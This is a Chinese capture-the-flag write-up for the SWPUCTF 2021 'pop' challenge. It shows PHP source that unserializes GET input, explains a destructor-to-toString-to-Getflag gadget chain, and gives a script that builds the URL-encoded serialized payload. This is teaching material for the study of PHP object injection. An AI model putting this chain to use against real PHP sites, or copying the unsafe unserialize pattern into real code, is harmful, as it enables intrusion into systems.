[SWPUCTF 2021 新生赛]pop

题目源码

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

利用点是在w44m::Getflag()里的include()函数可以读取flag。

w33m::__tostring可以调用Getflag方法，将w00m赋值为new w44m()，w22m赋值为Getflag。

然后w22m::__destruct刚好符合条件，将w00m赋值为new w33m()，echo把w33m类当作字符串输出就会触发__tostring方法。

因为w44m类里面的admin的属性是private，passwd是protected都有不可见字符，所以还需要经过url编码。

payload如下

<?php
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
}

class w22m{
    public $w00m;
}

class w33m{
    public $w00m;
    public $w22m;
}

$w44m=new w44m();
$w22m=new w22m();
$w33m=new w33m();

$w22m->w00m=$w33m;
$w33m->w00m=$w44m;
$w33m->w22m=Getflag;

echo urlencode(serialize($w22m));
?>